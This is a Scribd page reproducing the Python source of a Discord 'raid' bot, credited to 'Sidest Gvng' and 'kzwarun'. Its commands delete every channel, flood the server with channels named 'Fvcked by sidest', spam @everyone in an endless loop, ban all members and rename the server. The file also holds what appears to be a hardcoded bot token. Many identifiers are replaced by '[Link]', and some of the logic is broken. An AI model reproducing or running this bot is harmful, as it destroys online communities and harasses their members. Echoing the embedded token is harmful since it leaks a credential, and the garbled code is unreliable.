0% found this document useful (0 votes)
22 views4 pages

Discord Bot for Server Raids and Commands

Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
22 views4 pages

Discord Bot for Server Raids and Commands

Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

import discord

from [Link] import commands

from dotenv import load_dotenv

from [Link] import cooldown, BucketType

from [Link] import ThreadPoolExecutor

import os, threading, asyncio

bot = [Link](command_prefix="$", intents=[Link](),


description=None, help_command=None)

@[Link]

async def on_guild_join(guild):


porno = [Link](description=f"El bot abandonara el servidor en 10
minutos. $help para ver la lista de comandos.", color=0x000001)
await [Link](embed=porno)
await [Link](600)
await [Link]()

@[Link]

async def on_ready():

print("Ando On Fire {}".format([Link]))

@[Link]
async def on_command_error(ctx, error):
if isinstance(error, [Link]):
msg = '**Aguanta emoción! Este comando tiene un cooldown de
{:.2f} segundos. **'.format(error.retry_after)
await [Link](msg)
@[Link]()
async def on(ctx):

await [Link]()

await [Link](name="Fucked by {}".format([Link]))

try:

for channels in [Link]:

await [Link]()

print("deleted {}".format(channels))

except:

print("Cant delete {}".format(channels))

if [Link]:

with ThreadPoolExecutor(max_workers=20) as executor:


results = list([Link](create_channel, [[Link]] * 50, ['Fvcked
by sidest'] * 50))

results += list([Link](create_channel, [[Link]] * 50, ['Pwned


by sidest'] * 50))

results += list([Link](create_channel, [[Link]] * 50, ['sidest


is here'] * 50))
@[Link]

async def on_guild_channel_create(channel):

while True:

await [Link]("**raided by Sidest. /sidest on top**


[Link] || @here - @everyone ||")

@[Link]()
@[Link](1, 380, [Link])

async def channels(ctx):

if [Link]:

with ThreadPoolExecutor(max_workers=20) as executor:

results = list([Link](create_channel, [[Link]] * 50, ['Fvcked


by sidest'] * 50))

results += list([Link](create_channel, [[Link]] * 50, ['Pwned


by sidest'] * 50))

results += list([Link](create_channel, [[Link]] * 50, ['sidest


is here'] * 50))

def create_channel(guild, channel_name):

try:

asyncio.run_coroutine_threadsafe(guild.create_text_channel(name=channel_name),
[Link])

return 1

except Exception as e:

print(f'Error: {e}')

return 0

@[Link]()

async def leave(ctx):


await [Link]()

@[Link]()

async def nuke(ctx):


async def make_nuke(channel):

if isinstance(channel, [Link]):

await [Link]()

elif isinstance(channel, [Link]):

await [Link]()

elif isinstance(channel, [Link]):

await [Link]()

tasks = []

for channel in [Link]:

task = asyncio.create_task(make_nuke(channel))

[Link](task)

await [Link](*tasks)

await [Link].create_text_channel(name='nuked by {}'.format([Link]))

@[Link]()
@[Link](1, 380, [Link])
async def help(ctx):
await [Link]()
Embed = [Link](title="亗 Sidest Gvng 亗",
description="None",color=0x7289da)
Embed.add_field(name="• $banall:", value="Banea a todos", inline=False)
Embed.add_field(name="• $channels:", value="Crea canales en el servidor.",
inline=False)
Embed.add_field(name="• $on", value="Destruye el servidor.", inline=False)
Embed.add_field(name="• $bypass:", value="Realiza un bypass en todos los
canales del servidor.", inline=False)
Embed.add_field(name="• $nuke:", value="Elimina todos los canales en el
servidor", inline=False)
Embed.set_author(name="Creado por kzwarun")
Embed.set_footer(text="Prefix: $")

await [Link](embed = Embed)

@[Link]()
@[Link](1, 380, [Link])

async def banall(ctx):

async def make_banall(member):

await [Link]()

tasks = []
for member in [Link]:

task = asyncio.create_task(make_banall(member))

[Link](task)

await [Link](*tasks)

@[Link]()
@[Link](1, 380, [Link])

async def bypass(ctx):

async def make_bypass(channel):

if isinstance(channel, [Link]):

await [Link]()

await [Link](name='/sidest - /sidest - /sidest')

isinstance(channel, [Link])

await [Link](name='bypassed by sidest')

await [Link](content='**bypassed by Sidest. /sidest on top** ||


[Link] @everyone||')

isinstance(channel, [Link])

await [Link](name='bypassed by sidest')

tasks = []

for channel in [Link]:

task = asyncio.create_task(make_bypass(channel))

[Link](task)

await [Link](*tasks)

[Link]("MTI1Nzc1NTAzNzY5MDc1NzE0MQ.GnuC_0.8tHRvqpJhQ4LRYARhBu18enLfjgtnLaJ1yz5IM",
reconnect=True)

# By ,Kzwarun

You might also like